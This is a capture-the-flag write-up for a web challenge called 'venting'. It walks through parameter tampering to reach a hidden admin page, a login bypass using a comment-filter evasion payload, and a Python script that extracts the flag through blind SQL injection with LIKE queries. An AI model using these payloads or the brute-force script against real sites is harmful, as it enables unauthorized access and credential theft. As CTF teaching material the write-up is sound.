# venting
Categories: Web
> BHmmmm. This website is kinda sus... Can you become the imposter and vent towards the flag?
## Takeaways
Simple blind SQL injection. Content-based SQLi or time-based SQLi works.
## Solution
Upon vising the website we are presented with the following page.

So, let's send a request and see what happens.

As we can see, several requests are sent out. The `GET /inthevents` stands out as it contains an `isAdmin` parameter. So we change it to `true` and repeat the request.

We follow this secret location and we are presented with a pretty simple admin-login page.
<link rel="stylesheet" href="static/css/bootstrap.min.css">
<h1> You vented to admin! Now login with your credentials "admin"
<form action="/fff5bf676ba8796f0c51033403b35311/login" method="POST">
<label class="form-label mt-4" for="user">Username:</label>
<input class="form-control" type="text" id="user" name="user">
<label class="form-label mt-4" for="pass">Password:</label>
<input class="form-control" type="text" id="pass" name="pass">
<input class="form-control" type="submit" value="Login">

The comment hints that this is SQL-lite and we should probably do an SQL injection attack. Upon entering `foo'` as `user` and `bar` as `pass`, we are immediately presented with an error:
`Error when executing statement -> near "bar": syntax error SELECT * from users WHERE username='foo'' AND Password = 'bar';`
So this is definitely vulnerable to SQLi. We try the most basic payload `foo' OR 1=1 -- - `. But the error message now is:
`Error when executing statement -> near "ඞඞ": syntax error SELECT * from users WHERE username='foo' OR 1=1 ඞඞ ඞ ' AND Password = 'bar';`
With some more testing, we figure out that the application replaces `--` (comment) with `ඞඞ`. So, next I tried leaving an open comment to see what happens: `foo' OR 1=1 /*`. We successfully bypass the login as the rest of the query got commented away:
`If you're getting this you're not me. You'll never log in! ALSO I DIDNT HIDE ANYTHING IN MY PASSWORD SO DONT TRY!`
From the response, it seems that the password is in the flag. So we have to leak it. This is also a blind SQLi as the application does not respond with the query's data. Remember that the original query is `SELECT * from users WHERE username='foo' AND Password = 'bar';`. We will comment out the password part and replace it with a content-based blind SQLi query. So, the eventual query will look like:
`SELECT * from users WHERE username='admin' AND Password LIKE 'UMASS{XXX%' /*...`
where we will brute-force the password byte-by-byte.
import requests
import urllib3
import string
proxyDict = {
"http" : '',
"https" : '',
password = 'UMASS{'
alphabet = string.digits + string.ascii_letters
while(not password.endswith('}')):
found = False # If no character is found in the alphabet, append the closing '}'
for ch in alphabet:
new_password = password + ch
r = requests.post('',
data = {
'user' : f"admin' AND password LIKE '{new_password}%' /*",
'pass' : ""
assert(r.status_code == 200)
if r.text == "If you're getting this you're not me. You'll never log in! ALSO I DIDNT HIDE ANYTHING IN MY PASSWORD SO DONT TRY!":
password = new_password
found = True
if found == False:
password += '}'
print(password) # UMASS{7h35u55y1mp0573rcr4ck57h3c0d3}
So the flag is `UMASS{7h35u55y1mp0573rcr4ck57h3c0d3}`.